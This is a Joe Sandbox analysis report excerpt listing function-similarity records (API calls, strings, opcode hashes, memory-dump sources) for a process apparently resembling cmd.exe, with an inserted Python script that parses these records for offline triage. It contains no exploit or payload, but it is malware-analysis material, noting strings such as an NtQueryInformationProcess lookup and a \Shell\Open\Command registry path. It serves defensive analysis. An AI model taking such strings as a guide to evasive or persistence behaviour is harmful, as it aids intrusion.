                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1397130798-0
                                                                                                                    • Opcode ID: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                                                                                                    • Instruction ID: 34664e6156a1d32c6817267a535a5569741a9a4084b48e267746aadecc976287
                                                                                                                    • Opcode Fuzzy Hash: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                                                                                                    • Instruction Fuzzy Hash: F091A422A09B8A8AEA64AF11D4542B9FBB1FF84F96FE48135D94D47794EF3CD540C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BD06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06D6
                                                                                                                      • Part of subcall function 00007FF789BD06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06F0
                                                                                                                      • Part of subcall function 00007FF789BD06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD074D
                                                                                                                      • Part of subcall function 00007FF789BD06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD0762
                                                                                                                    • _wcsicmp.MSVCRT ref: 00007FF789BD25CA
                                                                                                                    • _wcsicmp.MSVCRT ref: 00007FF789BD25E8
                                                                                                                    • _wcsicmp.MSVCRT ref: 00007FF789BD260F
                                                                                                                    • _wcsicmp.MSVCRT ref: 00007FF789BD2636
                                                                                                                    • _wcsicmp.MSVCRT ref: 00007FF789BD2650
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmp$Heap$AllocProcess
                                                                                                                    • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                                    • API String ID: 3407644289-1668778490
                                                                                                                    • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                    • Instruction ID: 383bba7a901abc97d907fc68ec845616f3fc27c7e93672e814d3788794a9175a
                                                                                                                    • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                    • Instruction Fuzzy Hash: 61314F21A0C68A86FB147F61E819279EEB5BF85F82FE48035D60E462D5DE3CE404C735
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                                                    • String ID: &()[]{}^=;!%'+,`~
                                                                                                                    • API String ID: 2516562204-381716982
                                                                                                                    • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                                    • Instruction ID: 2678c8a95d3dee1442205657d502266f00b47787bc7f2aa4b6abd7cd2b32b40c
                                                                                                                    • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                                    • Instruction Fuzzy Hash: 62C19F32A0965586E754AF25E8402BEBBB0FB44F95FA45135DE8E43BA8EF3CE450C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD46E
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD485
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD4EE
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: iswspace.MSVCRT ref: 00007FF789BCD54D
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD569
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD58C
                                                                                                                    • iswspace.MSVCRT ref: 00007FF789BD7EEE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                    • String ID: A
                                                                                                                    • API String ID: 3731854180-3554254475
                                                                                                                    • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                    • Instruction ID: a0b601ccd5637211f41bbeaa8fe29e82144f50270297ae409c0137a31fe209b1
                                                                                                                    • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                    • Instruction Fuzzy Hash: 05A18C6190D6868AE660AF61E44427DFBB4FF45F92FA48034DA4E47794EF3CE441DB20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                                    • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                                                    • API String ID: 1580871199-2613899276
                                                                                                                    • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                                    • Instruction ID: 602341aadd481b161b18b769d46cc636394d344b273500f254cccb777a6ccd5a
                                                                                                                    • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                                    • Instruction Fuzzy Hash: D5515171A18B8686EB10AF15E80067DBBB8FB88F86F955135EA5E03B54DF3CD401C754
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
• String ID: con
• API String ID: 689241570-4257191772
• Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
• Instruction ID: 09fa438cfe9bbff5f43f216356ad2b10aed0e38628a4734d0af4256fe2f7642f
• Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
• Instruction Fuzzy Hash: 8E419231A086498AE210AF15948437DBEB5FB89FB6FA54334DA29533D0DF3DD849C750
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
• String ID: PE
• API String ID: 2941894976-4258593460
• Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
• Instruction ID: 9585f9989d36a1e4ae3322beb0937051986fd9534c1c5b1f98b0536b4c863620
• Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
• Instruction Fuzzy Hash: 9641616560868586E620AF11E41067EFFB8FB89F92F944230DE5D03B95EF3CE445DB20
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF789BE849D,?,?,?,00007FF789BEF0C7), ref: 00007FF789BD0045
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF789BEF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BD0071
• ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BD0092
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF789BD00A7
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BD0148
• MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF789BD0181
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
• String ID:
• API String ID: 734197835-0
• Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
• Instruction ID: f4ee308f52df0adb2ff546b7225aa6b219722e915cbf4566263f9fe6e7396104
• Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
• Instruction Fuzzy Hash: 79619431D0C69A86E724AF25A808379FEB1FB86F46FA48135D98E43794DF3CA405C760
Uniqueness

Uniqueness Score: -1.00%

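Every function record on this page follows the same fixed text layout: section headers ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"), each followed by "• Key: Value" bullets, with the record closed by its "Uniqueness Score" line. Reading hundreds of such records by eye is impractical, so the following added example (written for this page, not Joe Sandbox's own tooling or any code from this report) parses that layout into dictionaries that can be filtered by resolved API call, call-site address, string content or hash. The SAMPLE text is a constructed excerpt that mirrors the layout of the records here; the PATH_RE heuristic that flags string IDs containing a backslash-delimited path component (such as a registry key path) is an assumption of this example, not a report feature.

```python
"""Offline triage of Joe Sandbox function-similarity records.

Added example, not Joe Sandbox code.  It parses the per-function text layout
used on this report page (headers such as "APIs", "Memory Dump Source",
"Similarity", "Uniqueness", each followed by "• Key: Value" bullets) into
dicts so records can be filtered by API call, string or hash.  SAMPLE is a
constructed excerpt in that layout, not data copied from the report.
"""
import re

# Constructed sample: two records.  One "Associated" line keeps the
# "Download File" link residue that copying the rendered page produces.
SAMPLE = r"""APIs
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000), ref: 00007FF789BD0045
• ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BD0092
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Similarity
• API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
• String ID:
• API String ID: 734197835-0
Uniqueness

Uniqueness Score: -1.00%
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Similarity
• API ID: Enum$Openwcsrchr
• String ID: %s=%s$.$\Shell\Open\Command
• API String ID: 3402383852-1459555574
Uniqueness Score: -1.00%
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}
BULLET, LINK_RESIDUE = "• ", "Download File"
# "<api>.<module>(<args>), ref: <addr>"  or  "<api>.<module> ref: <addr>"
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>[\w.-]+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
PATH_RE = re.compile(r"\\[A-Za-z0-9_ ]+\\")   # assumed heuristic: a "\Shell\"-style component


def parse_api_call(body):
    """One APIs bullet -> name, module, argument list and call-site address."""
    m = API_RE.match(body)
    if not m:
        return None
    args = m.group("args")
    return {"name": m.group("name"), "module": m.group("module"),
            "args": args.split(",") if args else [], "ref": int(m.group("ref"), 16)}

def parse_source_file(body):
    """'Source File: X, Offset: Y, based on PE: true' -> dict of those keys."""
    return dict(part.partition(": ")[::2] for part in body.split(", "))

def split_ids(value):
    """The report joins several strings (or API groups) with '$'."""
    return [s for s in value.split("$") if s]

def _new_record():
    return {"apis": [], "source": {}, "associated": [], "fields": {},
            "uniqueness_score": None}

def parse_records(text):
    """Parse a run of records; each one ends at its 'Uniqueness Score' line."""
    records, cur, section = [], _new_record(), None
    for raw in text.splitlines():
        line = raw.strip()                 # blank lines match nothing below
        if line.startswith("Uniqueness Score:"):
            cur["uniqueness_score"] = float(line.split(":", 1)[1].strip().rstrip("%"))
            records.append(cur)
            cur, section = _new_record(), None
        elif line in SECTION_HEADERS:
            section = line
        elif line.startswith(BULLET):
            body = line[len(BULLET):]
            if section == "APIs":
                call = parse_api_call(body)
                if call:
                    cur["apis"].append(call)
            elif section == "Memory Dump Source":
                key, _, value = body.partition(": ")
                if key == "Source File":
                    cur["source"] = parse_source_file(body)
                elif key == "Associated":   # drop the rendered page's link text
                    cur["associated"].append(value.removesuffix(LINK_RESIDUE))
            else:                           # Similarity / IDA Plugin "Key: Value"
                key, _, value = body.partition(":")
                cur["fields"][key.strip()] = value.strip()
    if cur["fields"] or cur["apis"]:        # record cut off before its score line
        records.append(cur)
    return records

def path_like_strings(record):
    r"""String IDs that look like registry or file paths, e.g. \Shell\Open\Command."""
    return [s for s in split_ids(record["fields"].get("String ID", "")) if PATH_RE.search(s)]

def records_with_path_strings(records):
    return [r for r in records if path_like_strings(r)]
```

Run `parse_records` over the text of a whole report section and the result can be sorted or filtered in the usual ways: records sharing an "Opcode Fuzzy Hash" or "API String ID" across processes, all call sites of a given API by `ref`, or the few records whose string IDs name a path. A record truncated before its score line (as at the end of a page excerpt) is kept with `uniqueness_score` set to `None`.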
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Enum$Openwcsrchr
                                                                                                                    • String ID: %s=%s$.$\Shell\Open\Command
                                                                                                                    • API String ID: 3402383852-1459555574
                                                                                                                    • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                    • Instruction ID: dc353c4174861aaa6e403e47b12eee31b0740c6506c188e98ccad63909a334d8
                                                                                                                    • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                    • Instruction Fuzzy Hash: 25A1C561A0864A82EE10BF95D0102BDEAB4FF85F96FE44531DA4E07785EF7CD949C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$wcscmp
                                                                                                                    • String ID: %s
                                                                                                                    • API String ID: 243296809-3043279178
                                                                                                                    • Opcode ID: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                                                                                                    • Instruction ID: 7c5a5d5c0eea23a5e0898a8fa492a9965712f9fe5734ad78046793f132d4f533
                                                                                                                    • Opcode Fuzzy Hash: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                                                                                                    • Instruction Fuzzy Hash: 09A1A36270978A8AEB61EF21D8443F9ABB0FF44B4AFA04035DA4D47695EF3CE645C310
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$EnvironmentVariable
                                                                                                                    • String ID: DIRCMD
                                                                                                                    • API String ID: 1405722092-1465291664
                                                                                                                    • Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                                                    • Instruction ID: 882e33bc940eec38bb0857329425530dff62606c2b3d705f5db0d2a4cd4e7a66
                                                                                                                    • Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                                                    • Instruction Fuzzy Hash: 06818172A08BC68AEB20EF60E8842ED7BB5FB44B49F604139DA8D57B58DF38D145C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$wcschr$Process$AllocateFree_setjmp_wcsuprmemsetwcscmp
                                                                                                                    • String ID: FOR$ IF
                                                                                                                    • API String ID: 557945885-2924197646
                                                                                                                    • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                    • Instruction ID: 9d7bd50e53cce0e2e9e577b5bd62e5e80c7115c79b2af122b9cb92195f6da429
                                                                                                                    • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                    • Instruction Fuzzy Hash: 83519120B0965A82FE54BF159418179AEB1FF85FA6FE84634D91E477D1DE3CE901C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
